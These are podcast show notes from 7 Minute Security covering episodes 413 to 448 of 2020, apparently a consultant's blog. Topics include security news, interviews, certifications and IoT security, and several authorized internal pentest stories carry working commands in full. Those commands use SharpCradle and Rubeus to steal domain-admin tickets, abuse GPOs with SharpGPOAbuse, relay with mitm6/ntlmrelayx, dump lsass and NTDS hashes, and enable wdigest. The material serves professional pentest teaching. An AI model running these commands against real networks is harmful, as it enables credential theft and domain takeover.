Don't expect to be following along "live" with the instructor during the training sessions
You'll need to do a flippin' ton of studying and practicing on your own in between the live sessions
As you follow along with the lab exercises, some things won't work - and that might be by design, but the lab manual might not give you a heads-up. In those cases, be sure to check with your classmates in the Discord channel
Problems popping shells? Hint: it might not be a problem with your tools...but with your network/firewalll config!
The more PowerShell skills you can walk into this training with, the better.
We've got to play with some tools that were new(ish) to us:
- PowerUpSQL - check out these awesome cheat sheets too!
- HeidiSQL
- Rubeus
If you're an absolute rockstar in the pentest labs, don't think that you'll breeze right through the exam!
Some pros of this training: fast-moving, super knowledgable instructor. Outstanding content. Super value for the dollar investment - arguably the best pentest training bang for the buck. The labs themselves are quite good and realistic. You get the recordings of the live sessions after they're complete. The course covers some defense against these attacks as well - great to have the blue team perspective!
A few cons: the content might be too fast-moving. It can get easy to become "lost" and forget the objective of what each lab exercise is having you do. Lab manual doesn't necessarily match the PDF slides.

7MS #447: Cyber News - The End of 2020 as We Know It Edition Dec 23, 2020

Merry Christmas! Happy holidays! Please enjoy the last cyber news edition of 2020, brought to us by our good pal Gh0stHax. Stories covered include:

You've probably heard this by now, but FireEye had a breach that was truly sophisticated. Here's a really nice plain English breakdown of the situation for folks who may not be interested in the deep technical details.
Chris Krebs, former CISA director, sues Trump campaign lawyer after death threats
CSOOnline has a nice article on 4 security trends to watch for in 2021 which we may or may not agree with!

7MS #446: Certified Red Team Professional - Part 2 Dec 17, 2020

Today's episode continues part 1 of our series on the Certified Red Team Professional certification. Key points from today's episode include:

It's probably a better idea to run Bloodhound on your local machine so you don't crush the student VM's resources
Running Invoke-Command is one of my new favorite things. Check this post for a bunch of cheatsheet tips for running commands in PowerShell against other hosts.
Silver, gold and skeleton key attacks in AD - are they awesome? Yes? Do I see myself using those in short-term pentest enagements? Meh.
Wanna build a home lab to do some of these fun pentest stuff? Our buddy k3nundrum in Slack recommended we check out this. It looks awesome. And the devs of the tool have a video on it here.
When you're popping shells and privs all over the place in the lab, it can be confusing to figure out which machines you have what privileges on. I like using the klist command. Or, from a mimikatz prompt, try kerberos::list /export.

7MS #445: Certified Red Team Professional Dec 09, 2020

Welp, I need another certification like I need a hole in the head, but that didn't stop me from signing up for the Certified Red Team Professional. So I've started a series on sharing what I'm learning as I proceed through the certification path. (We're also talking about this on the 7MS forums)

Here are some of the highlights from week 1:

Boy oh boy is PowerView handy for extracting juicy info out of Active Directory. It works well when served with a side order of the Microsoft signed DLL for the ActiveDirectory PowerShell module
I wouldn't say this course is for beginners. You will get some high level intro to PowerShell, Active Directory and pentesting, but you will need to do a ton of self-study and banging around in the lab to fill in some skill gaps.
When trying to pop a Jenkins box, I learned about a few new helpful tools I'd never played with before:
- HFS - simple HTTP file server
- Powercat - for catching shells!

Then on a personal front, I have a few updates to share as well:

The Thanksgiving surprise that brought tears to my eyes
The new piece of exercise equipment in the Johnson household that made my wife reach for a barf bag
A mysterious sound in the house that lead to the discovery of dead things over Thanksgiving break

7MS #444: Interview with Christopher Fielder of Arctic Wolf Dec 02, 2020

Happy December! Today I virtually sat down with Christopher Fielder of Arctic Wolf, who started his career in security at 18 (I was just playing a lot of video games when I was that old)! Christopher has served in the Air Force, worked for a university and SANS, served for some three-letter organizations - and more!

Christopher and I had a great chat about a variety of security topics, including:

Threat hunting - why it's a term that means so many things to different people, how to get started in it and how to start building a threat hunting team
Threat intel - its relationship to threat hunting, and how to make sense of the jillions of intel feeds out there
Pentesting your MDR/SIEM - we talk about our gist on evaluating an MDR/SIEM, and how to throw some technical tests at these systems to figure out if they're worth the cost!

7MS #443: Cyber News - Thankful for Patches Edition Nov 26, 2020

Happy Thanksgiving! While the turkey and pie settle in your belly, why not also digest some fantastic security news stories with our pal Gh0sthax?

Today's stories include:

It was another epic month of patching - both Threatpost and Krebs have great coverage of what you need to know.
We don't support software pirating, but it's interesting that we just got a demo of Cobalt Strike spun up, and now the source code was leaked.
Always download software updates from their source, not from not-so-trustworthy sources like random search results in Google and pop-up boxes.
As a follow up to a story from last month, ransomware was not to blame for the death of a woman in Germany.

7MS #442: Tales of Internal Network Pentest Pwnage - Part 23 Nov 19, 2020

Hey friends, I dare declare this to be my favorite tale of internal pentest pwnage so far. Why? Because the episode features:

Great blue team tools alerting our customer to a lot of the stuff we were doing
An EDR that we tried to beat up (but it beat us up instead)
SharpGPOAbuse which we talked about extensively last week
Separation of "everyday" accounts from privileged accounts
Multi-factor authentication bypass!
Some delicious findings in GPOs thanks to Ryan Hausec's great two part series (1 and 2). If you're not sure if you're vulnerable to MS14-025, check out this great article which discusses the vulnerability and its mitigation.

The final cherry on top was a new attack another pentester taught me. Use a combination of SharpCradle and Rubeus to steal logged in DA creds:

SharpCradle.exe -w https://your.kali.box.ip/Rubeus.exe dump /service:krbtgt /nowrap

This will give you a TGT (base64 encoded) for active logon sessions to the box. So if a DA is logged in, you can snag their TGT and then convert that into a .kirbi file on your Kali box with:

echo "LooooonnnnnggggggTicketStriiiiiiiiiiinnnngggg" | base64 -d > BobTheDomainAdmin.kirb

Convert the .kirbi file to a .ccache file with ticket converter. Then you can use Impacket tools to use/abuse that access to your heart's delight.

We ended up using Impacket to pop a shell on a DC and add a low-priv account to DA. The interesting thing is that the alert the blue team received essentially said "The DC itself added the user to the DA group" - the alert did not have attribution to the user whose ticket we stole! Good tip for future pentests!

7MS #441: SharpGPOAbuse Nov 15, 2020

Hello friends! Sorry to be late with this episode (again) but we've been heads-down in a lot of cool security work, coming up for air when we can! Today's episode features:

A little welcome music that is not the usual scatting of gibberish I torture you with
Some cool tools I'm playing with in the lab that we'll do future episodes on in the future:
- DetectionLab to practice detecting all the bad things!
- BadBlood to dirty up your AD (your test AD with groups, computers, permissions, etc.). I wish the user import script would let you choose a list of bad passwords to assign the users, but you can also run it manually if you want.
- Cobalt Strike - we're doing a demo right now!

Most of today's episode focuses on SharpGPOAbuse, a tool that can be used to abuse "generic write" access to GPOs (which you might identify after running BloodHound). Here's a sample syntax you could run:

SharpGPOAbuse.exe --AddUserTask --TaskName "Totes Safe Windoze Updatez" --Author SAMPLECO\ADMINISTRATOR --Command "cmd.exe" --Arguments "/c net group \"Domain Admins\" SomeLowPrivUser /ADD DOMAIN" --GPOName "Name of GPO with Generic Write Access"

This will push a ScheduledTasks.xml file to \\sample.company\Policies\LONG-STRING-REPRESENTING-THE-GPO-ID\User\Preferences\ScheduledTasks

Now if you find that the task is not pushing correctly, it may be that SharpGPOAbuse.exe hasn't been able to update either the GPT.INI file (in the root of the GPO path) and/or the versionNumber value assigned to the GPO itself. If you need to adjust the versionNumber and GPT.INI value manually, definitely read this Microsoft article so you know how the number is generated and how to increment it properly. This flippin' sweet RastaMouse blog article also helped this click for me.

If you can't seem to update versionNumber using the PowerShell in Rasta's article, you can also open up ADSI Edit and navigate to Default naming context > DC=your,DC=com > CN=System > CN=Policies > CN=LONG-STRING-REPRESENTING-THE-GPO-ID then get the properties of the folder, scroll down and manually adjust the value for versionNumber.

7MS #440: Tales of Internal Network Pentest Pwnage - Part 22 Nov 08, 2020

Hi! Sorry to be so late with this episode, but I'm excited to share with you another fun tale of pentest pwnage! Key points from today's episode include:

We do not do these episodes to brag or put down any company about their security posture. We do do (heh, I said "do do") these episodes to share what we're learning about pentesting it helps you become a better network defender and/or offender!
Early in an engagement it can be fruitful to run Pcredz to find goodies in the clear like hashes, CC numbers, SNMP traps and more!
Run hashes right through the Hashes.org cracked Pwned Passwords list for more management-level impact on your efforts. Do the same with Kerberoastable accounts
Once you've gotten a local or domain admin account, use CrackMapExec to dump a workstation's local hashes, then do something VERY important that I just learned this week (details in today's episode) to maybe get insta-DA!

7MS #439: Cyber News - Ransomware is Definitely Still a Thing Edition Oct 29, 2020

Happy October and merry Halloween everybody! We're back with our buddy Joe "the machine" Skeen who is also now a Principal Security Engineer for 7MS! He's also working on a new cert, and speaking of certs, 7MS is now PCIP certified!

Today's great cyber stories include:

Azure AD is a single point of failure in many networks
Ransomware sophistication continues to grow - as demonstrated in this story, this one and this one
Ransomware such as Ryuk can go from phishing email to total domain domination in 5 hours or less
Don't forget to patch - Microsoft remediated some doozies! Something like 0 patch looks particularly interesting to aid in your patching efforts (not a sponsor, but maybe some day ;-)

P.S. We've got a Halloween Webinar coming up Friday with our friends at Netwrix - sign up and we'll see you there!

7MS #438: PCI Professional Certification (PCIP) - Part 4 Oct 21, 2020

Yay - I'm a PCIP now! I welcome you to check out our past episodes on PCIP, but in some ways this will be the be all, end all episode on the topic. Today I cover:

Study materials that helped me prepare:

PCIP book by Linda Jones (I couldn't actually get this one in time but it looks awesome!)
Flashcards from Cram
Flashcards from Quizlet
My flashcards from Quizlet (I'll need to sanitize these and give you the password. Contact me if interested)
Flashcards from ProProfs
Documentation from PCI Web site itself - specifically the glossary, quick reference guide and my personal favorite, the prioritized approach guidance

I also talk about taking the exam from home which was an interesting experience (as well as a privacy/security mini nightmare!).

7MS #437: Homecoming and Home ioT Security - Part 3 Oct 14, 2020

Hello! This episode is a true homecoming in that I actually recorded it from home. Yay!

WARNING!!! WARNING!!! This episode contains a ton of singing. If you don't like singing, do not listen!!!

With that said, I wanted to follow up on part 1 and 2 of this series and share some additional cool tools that others have told me about in regards to securing and monitoring all your ioTs!

Home Assistant - is described on its Wikipedia page as "a free and open-source home automation software designed to be the central control system in a smart home or smart house." You can quickly grab the HA image and dump it on an SD card with Balena Etcher and be up and running in minutes. I found HA a bit overkill/complicated for my needs, but my pal Hackernovice (on 7MS Slack) says this video demonstrates why he really loves it.
Prometheus, recommended by our pal Mojodojo101, is "a systems and service monitoring system. It collects metrics from configured targets at given intervals, evaluates rule expressions, displays the results, and can trigger alerts if some condition is observed to be true." I found a great RPi install guide that will help you get it up and running in a snap. I love the capabilitiesand possibilities of Prometheus, but much like Home Assistant, it quickly got to "more than I need" territory.

The final thing we talk about today is trying to answer this question: with so many of my ioTs tied to some cloud app/service, how do I keep these accounts themselves as secure as possible?

Songs sung in this episode include:

Follow Through by Gavin DeGraw
Livin' on a Prayer
The Look that Says You Love Me (Brian Johnson)
Goodness of God

7MS #436: Cleaning Up Your Cloud Clutter Oct 07, 2020

Hey, hope you're having a great week! The last few weeks have had somewhat of a homecoming and home cleaning theme. To continue that train of thought, over the last few days I've gotten heavy into cleaning up my cloud clutter - cloud services, email, file sharing, etc. - in an effort to be more secure and have a reduced digital footprint. Today's tips include:

Double-check that any device you have that supports full-disk encryption has it enabled
On all your machines, clean up old straggler artifacts in C:, desktop folder, downloads folder, etc. Use the nifty built in tools for Windows 10 to free up even more disk space (I just learned about this one recently - Windirstat and Treesizefree were my go-tos for years)
Got old PCs sitting around you're not using? Nuke 'em with DBAN.
Go into your password vault and clean out creds for services you don't use anymore (especially for old client projects!)
Purge your file share services (Dropbox, OneDrive, etc. on a regular basis), and/or bring older archives over to cold (on-site) encrypted storage
Review your "bottleneck" accounts (key email accounts, for example) and review the devices/services linked to them - clean up and purge regularly
Handling password hashes? Here's one way to setup an encrypted partition for them
You can clean old email from Gmail quickly using some simple searches. You can also use Google Takeout to download offline copies of mail and then browse them later with Thunderbird

7MS #435: Homecoming and Home ioT Security - Part 2 Oct 02, 2020

Hi again! It's sort of fun to release two episodes in one week for a change. If you missed part 1 on our ioT security series, check it out here. Today we dive into some free/cheap monitoring solutions you can use to keep tabs on your ioT network (or any network, really):

Nagios - it's old school but gets the job done. This article helped me get it going on an RPi.
SolarWinds IP monitor - it was quick and easy to get up and running, but the 40 monitors you're allotted get burned up pretty quick if you have a decent number of devices to monitor
PRTG - this is the winner in my book. It has a generous amount of monitors, quick/easy install, and a native mobile app!

7MS #434: Homecoming and Home ioT Security Oct 01, 2020

WE'RE HOME! After almost a year after our fire, we're back, baby!

This episode is somewhat of a homecoming that dovetails into an episode about ioT security. I've basically done a 180 degree spin on ioT stuff. I now love the coolness and convenience of these things while simultaneously being terrified of the security risks. Is there a happy balance somewhere between the two? Maybe. Today we dive into ioT security, specifically:

Setting up a ioT dedicated wireless network
Quarantining it so it can only talk to the Internet
Poking holes in the firewall to allow ioT DNS requests to be captured
Scanning your ioT for services and potential default/weak cred use

7MS #433: Cyber News - Security Skills Gap Edition Sep 23, 2020

Hi! Today our pal Joe "The Machine" Skeen (a.k.a. Gh0sthax has prepared some cyber-licious actionable news stories for us to chew on. Today's stories include:

On a parting note, don't forget to patch your DCs against Zerologon! Here's a great Twitter thread breakdown that explains it in more detail

7MS #432: Tales of Internal Network Pentest Pwnage - Part 21 Sep 16, 2020

Yay! It's time for another tale of pentest pwnage! Highlights include:

Making sure you take multiple rounds of "dumps" to get all the delicious local admin creds.
Why lsassy is my new best friend.
I gave a try to using a Ubuntu box instead of Kali as my attacking system for this test. I had pretty good results. Here's my script to quickly give Ubuntu a Kali-like flair:

sudo apt-get update sudo apt-get upgrade -y sudo apt-get install openssh-server -y sudo apt-get install nmap curl dnsrecon git net-tools open-vm-tools-desktop python3.8 python3-pip unzip wget xsltproc -y #Aha helps take output from testssl.sh and make it nice and HTML-y sudo git clone https://github.com/theZiz/aha.git /opt/aha #Awesome-nmap-grep makes it easy to grep nmap exports for just the data you need! sudo git clone https://github.com/leonjza/awesome-nmap-grep.git /opt/awesome-nmap-grep #bpatty is...well...bpatty! sudo git clone https://github.com/braimee/bpatty.git /opt/bpatty #CrackMapExec is...awesome sudo mkdir /opt/cme cd /opt/cme sudo curl https://github.com/byt3bl33d3r/CrackMapExec/releases/download/v5.1.0dev/cme-ubuntu-latest.1.zip -L -o cme.zip sudo unzip cme.zip sudo chmod +x ./cme #eyewitness is a nice recon tool for putting some great visualization behind nmap scans sudo git clone https://github.com/FortyNorthSecurity/EyeWitness.git /opt/eyewitness cd /opt/eyewitness/Python/setup sudo ./setup.sh #impacket is "a collection of Python classes for working with network protocols" #I currently primarily use it for ntlmrelayx.py sudo git clone https://github.com/CoreSecurity/impacket.git /opt/impacket cd /opt/impacket sudo pip3 install . #mitm6 is a way to tinker with ip6 and get around some ip4-level protections sudo git clone https://github.com/fox-it/mitm6.git /opt/mitm6 cd /opt/mitm6 sudo pip3 install -r requirements.txt # install service-identity sudo pip3 install service-identity # lsassy sudo python3 -m pip install lsassy #nmap-bootstrap-xsl turns nmap scan output into pretty HTML sudo git clone https://github.com/honze-net/nmap-bootstrap-xsl.git /opt/nmap-bootstrap-xsl #netcreds "Sniffs sensitive data from interface or pcap" sudo git clone https://github.com/DanMcInerney/net-creds /opt/netcreds #PCCredz parses pcaps for sensitive data sudo git clone https://github.com/lgandx/PCredz /opt/pcredz #Powersploit is "a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment" sudo git clone https://github.com/PowerShellMafia/PowerSploit.git /opt/powersploit #PowerupSQL is a tool for discovering, enumerating and potentially pwning SQL servers! sudo git clone https://github.com/NetSPI/PowerUpSQL.git /opt/powerupsql #responder is awesome for LLMNR, NBT-NS and MDNS poisoning sudo git clone https://github.com/lgandx/Responder.git /opt/responder

7MS #431: How to Succeed in Business Without Really Crying - Part 8 Sep 09, 2020

Today we're talking business! We've got some exciting news and updates to share with you since we last did a "crying" episode last fall:

7MS hired a VP of sales and marketing: Clyde Cooper!
We've added some new tools to our tools/services gist:
- Having a true sales force for the first time has prompted us to invest in Salesforce. There are a few gotchas with signing up for a Salesforce trial and then migrating to a paid plan (discussed more in today's episode)
- We're trying to "eat our own dog food" and part of that includes good inventory management. For that we've started to play with Rumble and reaaaaaaaaaaalllly like it
Recording an "about us" video with a production company is exciting, stressful and awkward
Today I met the guy who wins the Internet (or at least LinkedIn) - he sent me a personalized video with an idea I'm definitely going to steal for future marketing initiatives
For really no reason at all, I sing for you a bit in this episode
- On that note, I absolutely love this song. I feel like it's my family's theme song for the last year.

7MS #430: Interview with Dan DeCloss Sep 02, 2020

Today we're thrilled to have our friend and PlexTrac CEO Dan DeCloss back to the program! (P.S. PlexTrac is launching runbooks as a feature - and you should definitely check out PlexTrac's upcoming Webinar about runbooks on September 9!). We also did a PlexTrac 101 Webinar with them recently!

You may remember Dan from such podcasts as this one when we first talked to him in 2019. Dan and I have a lot in common in that we both started security companies about the same time, so I had a lot of questions for Dan around how business has been going since we last talked on the podcast. Today our topics/questions include:

What are the (good) warning signs that a passion project you have could be a viable business?
Why "having all the jobs there has ever been" is a great way to figure out it's time to start your own business :-)
At what point does a side project have to become what you do for your day job?
How do you safely prepare to quit a comfortable corporate life to life as a small biz owner? Do you go 100% on faith? Do you save your $ for a year so you can "float" your business for a while? Some combination of the two?
How important is it to have the support of your friends/family when starting a new biz?
Once you start a biz what are the best/worst things about wearing all the hats (engineering, sales, marketing, accounting, HR, etc.)?
When is it time to hire additional resources or raise additional money to support your growing business?
What marketing efforts are fruitful for a new security biz to spend time/money on?
How do you decide what bells/whistles to add to PlexTrac? Follow your own roadmap? Let the customers drive your direction? Some combo of both?
What new bells and whistles are coming to PlexTrac in the Webinar on September 9?! (Spoiler alert: RUNBOOKS!)

7MS #429: Cyber News - Free Bitcoin for Everybody Edition Aug 26, 2020

Hola! We're back again with our amigo Joe "The Machine" Skeen (a.k.a. Gh0sthax) who has prepared some awesome and actionable news stories for us to digest. Today's stories include:

The Twitter hack that promised free Bitcoin for everybody - with good coverage by Krebs and Threatpost
Garmin's personal and painful experience with ransomware
Joe offers 7 tips any org can use to reduce their likelihood of getting pwned with an attack or ransomware
Are we ready to endure a cyber crisis?
Would you fall for this social engineering attack?

7MS #428: Tales of Internal Network Pentest Pwnage - Part 20 Aug 19, 2020

Welcome to another fun tale of internal pentest pwnage! Today's tale includes these helpful informational tidbits:

My understanding is that in order for mitm6 relay attacks to work against DCs, those DCs have to have LDAPS config'd properly. Use nmap -sV -p646 name.of.domain.controller to verify this (thanks this site for the tip!)
PowerView is awesome when used with Find-InterestingDomainShareFile to find interesting files with the word password or sensitive or other helpful strings.
eavesarp helped me identify some weird hosts on weird subnets sending regular bursts of traffic to "interesting" hosts! Check out this video from Black Hills Infosec to learn more.

I've also got some personal updates for you, including:

House updates
Fighting with the man/woman upstairs
My worst Webinar nightmare came true
A socially distanced wedding singing experience

7MS #427: Interview with Ameesh Divatia from Baffle Aug 12, 2020

Today we're thrilled to welcome Ameesh Divatia from Baffle back to the program. We first met Ameesh back in episode 349 and today he's back to discuss a slew of additional hot security topics, including:

Misconfigured cloud databases

Why is this such a common issue, and how can we address it?
Wait wait wait...I just spun up a machine in Azure, AWS, Digital Ocean, etc. Isn't it secure because....it's the cloud?
What tools can we use to better secure our cloud databases?
How can we secure sensitive information as we migrate it from LAN side to the cloud?

CCPA (California Consumer Privacy Act)

What is the CCPA? How does it relate to GDPR?
If I'm a Californian, what can I demand to know from companies as far as how they're using my data? What can't I demand to know?
Will CCPA inspire folks to scrub their data from the hands of big companies and go more "off the grid?"
Does CCPA only apply to California residents and companies?

Secure data sharing

What are the current challenges with secure data sharing in terms of monitoring the flow of data within their systems and their partners’ systems, while addressing privacy concerns?
What are some of the common mistakes companies make when sharing sensitive data internally or with partners/clients?
What is Secure Multiparty Compute (SMPC) and how can it help with secure data sharing?

7MS #426: Tales of Internal Pentest Pwnage - Part 19 Aug 07, 2020

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.

First and foremost, I have to say that 7 Minute Security's official stance on toads is that nobody should be licking them at any time, for any reason. Also, I can neither confirm nor deny that toads can catch coronavirus. Listen to today's episode...it'll make more sense.

We've got another swell tale of internal pentest pwnage for you today! Highlights include:

If you've collected a ton of hashes with Responder, the included DumpHash.py gives you a lovely organized list of collected hashes!
Here's one way you can grab the latest CME binary:

curl https://github.com/byt3bl33d3r/CrackMapExec/releases/download/v5.0.1dev/cme-ubuntu-latest.zip -L -o cme.zip

Note to self: I must've been using outdated CME forever, because the correct syntax to get the wdigest flag is now a little different:

cme smb HOST -u localadmin -H "hash" --local-auth -M wdigest -o ACTION=enable

If you're looking to block IPv6 (ab)use in your environment, this article has some great tips.
When testing in an environment with a finely tuned SIEM, I highly recommend you download all the Kali updates and tools ahead of time, as sometimes just the call out to kali.org gets flagged and alerted on to the security team
Before using the full hatecrack methodology, I like to run hashes straight through the list of PwnedPasswords from hashes.org (which appears to currently be offline) first to give the org an idea as to what users are using easy-to-pwn passwords.
A question for YOU reading this: what's the best way to do an LSASS dump remotely without triggering AV? I can't get any of the popular methods to work. So pypykatz is my go-to.
I learned that PowerView is awesome for finding attractive shares! Run it with Find-InterestingDomainShareFile to find, well, interesting files! Files with password or sensitive or admin in the title - and much more!
Got to use PowerUpSQL to audit some MS SQL sauce, and I found this presentation (specifically slide ~19) really helpful in locating servers I could log into and any SQL vulnerabilities the boxes were ripe for.

7MS #425: DIY Pentest Dropbox Tips - Part 2 Jul 30, 2020

Today's episode is all about creating and deploying your own pentest dropbox! In part 1 I talked about some "gotchas" but this time around I'm ready to dump a whole slug of specific and updated tips on ya! Below are the tips covered in this episode that are better read than said:

For the Windows VM

Turn on RDP with PowerShell:

Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0 Enable-NetFirewallRule -DisplayGroup "Remote Desktop"

Change time zone with command line:

tzutil /s "Central Standard Time"

Install Chrome with PowerShell:

$LocalTempDir = $env:TEMP; $ChromeInstaller = "ChromeInstaller.exe"; (new-object System.Net.WebClient).DownloadFile('http://dl.google.com/chrome/install/375.126/chrome_installer.exe', "$LocalTempDir\$ChromeInstaller"); & "$LocalTempDir\$ChromeInstaller" /silent /install; $Process2Monitor = "ChromeInstaller"; Do { $ProcessesFound = Get-Process | ?{$Process2Monitor -contains $_.Name} | Select-Object -ExpandProperty Name; If ($ProcessesFound) { "Still running: $($ProcessesFound -join ', ')" | Write-Host; Start-Sleep -Seconds 2 } else { rm "$LocalTempDir\$ChromeInstaller" -ErrorAction SilentlyContinue -Verbose } } Until (!$ProcessesFound)

Install PowerUpSQL:

Install-Module -Name PowerUpSQL

Turn off sleepy time:

powercfg.exe -change -standby-timeout-ac 0

Install DotNet 3.5:

dism /online /Enable-Feature /FeatureName:"NetFx3" For the Kali VM

Refresh the SSH keys:

apt install openssh-server -y mkdir /etc/ssh/default_keys mv /etc/ssh/ssh_host_* /etc/ssh/default_keys/ dpkg-reconfigure openssh-server systemctl enable ssh.service systemctl start ssh.service

Get SharpHound and Mimikatz:

wget https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200519/mimikatz_trunk.zip wget https://github.com/BloodHoundAD/BloodHound/raw/master/Ingestors/SharpHound.exe

Install pypykatz

sudo pip3 install pypykatz

Install CrackMapExec binaries (which at time of this publication is this one):

curl https://github.com/byt3bl33d3r/CrackMapExec/releases/download/v5.0.1dev/cme-ubuntu-latest.zip -L -o cme.zip

7MS #424: Cyber News - Everything is Pwned Edition Jul 22, 2020

Hello! We're back with our pal Joe "The Machine" Skeen (a.k.a. Gh0sthax) who has prepared some awesome and actionable news stories for us to digest. Today's stories include:

7MS #423: Tales of Internal Pentest Pwnage - Part 18 Jul 15, 2020

This is an especially fun tale of pentest pwnage because it involves D.D.A.D. (Double Domain Admin Dance) and varying T.T.D.A. (Time to Domain Admin). The key takeaways I want to share from these tests are as follows:

Responder.py -i eth0 -rPv is AWESOME. It can make the network rain hashes like manna from heaven!
Testing the egress firewall is easy with this script. Consider this SANS article for guidance on ports to lock down.
Testing for MS14-025 is easy with this site.
mitm6 and ntlmrelayx can work really well together to rain shells if you follow this article. It's especially handy/focused when you create a targets.txt that looks something like this:

smb://CORP\Administrator@192.168.195.2 smb://CORP\Administrator@192.168.195.3 smb://CORP\brian.admin@192.168.195.7 192.168.195.7 192.168.195.10

Then save that as your targets.txt and run ntlmrelayx with ./ntlmrelayx.py -tf /targets.txt -socks -smb2support. From there, once you get active socks connections, you can connect to them directly with a full interactive shell with something like proxychains smbclient //192.168.195.2/ -U CORP/brian.admin

I ran into a weird issue with CrackMapExec where the --local-auth flag didn't seem to be working so I ended up trying the binary version and then it worked like a champ!
Looking to dump lsass a "clean" way? Try RDPing in directly to the victim machine, opening up taskmgr.exe, click the Details tab, then right-click lsass.exe and choose Create dump file and bam, done.
Wanna spin up a quick SMB share from your Kali box? Try smbserver.py -smb2support share /share
Then, once you've pulled back the lsass.dmp file, you can rip through it easily with:

pip3 install pypykatz sudo pypykatz lsa minidump lsass.dmp > lsass.txt

Then comb through lsass.txt and hopefully there will be some delicious and nutritious DA creds there for you to much on!

7MS #422: Eating the Security Dog Food - Part 2 Jul 10, 2020

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit [safepass.me](https://safepass.me/?7ms422 for more details, and tell them 7 Minute Security sent you to get a 10% discount!

Today's episode continues the work we started in episode #419. We talk about the importance of having a good foundation of security documentation - including a reading out of the following policies:

Acceptable use
Data protection and privacy

7MS #421: Cyber News - Verizon DBIR Edition Jul 01, 2020

Today my pal Gh0sthax and I pick apart the Verizon Data Breach Investigations Report and help you turn it into actionable items so you can better defend your network!

I'm especially excited because today's episode marks two important 7MS firsts:

The episode has been crafted by a professional podcast producer
The episode has been transcribed by a professional transcription service

7MS #420: Tales of Internal Pentest Pwnage - Part 17 Jun 26, 2020

Today's episode is a fun tale of pentest pwnage! Interestingly, to me this pentest had a ton of time-sponging issues on the front end, but the TTDA (Time to Domain Admin) was maybe my fastest ever.

I had to actually roll a fresh Kali VM to upload to the customer site, and I learned (the hard way) to make that VM disk as lean as possible. I got away with a 15 gig drive, and the OS+tools+updates took up about 12 gig.

One of the biggest lessons I learned from this experience is to make sure that not only is your Kali box updated before you take it to a customer site (see this script), but you should make sure you install all the tool dependencies beforehand as well (specifically, Eyewitness, Impacket and MITM6).

This pentest was also extremely time-boxed, so I tried to get as much bang out of it as possible. This included:

Capturing hashes with Responder
Checking for "Kerberoastable" accounts (GetUserSPNs.py -request -dc-ip x.x.x.x domain/user)
Check for MS14-025 (see this article)
Check for MS17-010 (nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17-010 192.168.0.0/24 -oA vulnerable-2-eblue) and try this method of exploiting it
Check for DNS zone transfer (dnsrecon -d name.of.fqdn -t axf)
Test for egress filtering of ports 1-1024
Took a backup of AD "the Microsoft way" and then cracked with secretsdump:

sudo python ./secretsdump.py -ntds /loot/Active\ Directory/ntds.dit -system /loot/registry/SYSTEM -hashes lmhash:nthash LOCAL -outputfile /loot/ad-pw-dump

7MS #419: Eating the Security Dog Food Jun 17, 2020

Today we're talking about eating the security dog food! What do I mean by that? Well, a lot of security companies I worked for in the past preached to clients about the importance of having a good security program, but didn't have one of their own! I'm trying to break that pattern now that I'm in a position to lead an information security program for 7MS.

In today's episode we talk about getting your company started with a good set of infosec policies/procedures. First up is a "mothership" infosec policy with the following sub-policies inside it:

Acceptable Use
Data Protection and Privacy
Physical Security
Tools and Technology
Training and Awareness
Reporting

Oh, and the song I jazz/scat/sang coming out of the jingle was If I Were a Dog

7MS #418: Securing Your Mental Health Jun 11, 2020

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

Today's episode is all about mental health! I talk about some of my challenges with stress/anxiety and how I finally put on my big boy pants, dropped some misconceptions and decided to do something about it. Additionally, this episode contains references to:

7MS #417: Vulnerability Scanning Tips and Tricks Jun 04, 2020

Today's episode is all about getting the most value out of your vulnerability scans, including:

Why, IMHO you should only do credentialed scans
Policy tweaks that will keep servers from tipping over and printers from printing novels of gibberish ;-)
How to make your scan report more actionable and less unruly
Turning up logging to 11 (use with caution!)
A small tweak to an external scan policy that can result in the difference between a successful or failed scan
The nessusd.rules file is awesome for excluding specific hosts and services from your scans

7MS #416: Pi-hole 5.0 May 28, 2020

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.

Today we're talking about some of my favorite features of Pi-hole 5.0. Including:

WARNING! WARNING! Upgrading from 4.x is a one-way operation!
Per-client blocking (you can setup, for example, a group machines called "kids" and apply specific domain block/allow lists and domains to them)
More granular detail (especially if there are issues) when blocklists get updated
Better, richer debug log output

I also talk about a great companion for yor Pi-hole: a command-line Internet speed test! Hat tip to Javali over at the 7MS forums who told me about this.

Additionally, I briefly mention "Hashy" (the nickname of my password cracking rig), give you some stay-at-home streaming TV show recommendations, and give you a quick house rebuild update!

7MS #415: Cyber News May 21, 2020

Today's episode kicks off a fun little experiment where my pal Joe Skeen and I cover some of the week's interesting security news stories, how they might affect you, and what you can do to make you and your company more secure. This week's stories:

Salt stack RCE (Daily Swig / Cyber Scoop)
Malware uses Corporate MDM as attack vector (Checkpoint)
Critical vulns in Sharefile (Citrix)
Shareholders sue Labcorp over their 'persistent' failure to secure data (Cyberscoop)

7MS #414: Tales of Pentest Fail #4 May 14, 2020

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

Today I'm excited to share more tales of pentest FAIL with you. Today's tales include:

Accidentally scanning assets that belong to an agency that nobody should be messing with
Delivering reports with vulnerabilities from somebody else's network
Why it's important to write a report more than 15 minutes before delivery
Lessons learned from firing a disgruntled employee

7MS #413: PCI Professional Certification (PCIP) - Part 3 May 07, 2020

Hey everybody! I hope you're hanging in there during quarantine and staying healthy. Today is part 3 of our ongoing series all about becoming a PCIP. The good news is I'm finally, actually registered for the cert and have started diving into the training! So in today's episode I want to regurgitate some of what I'm learning to whet your appetite (or not) for this particular certification. Specifically, we cover:

The overview and objectives for being a PCIP (TLDR: PCIP does NOT replace QSA or ISA, but gives us a good understanding of how to protect payment card data)
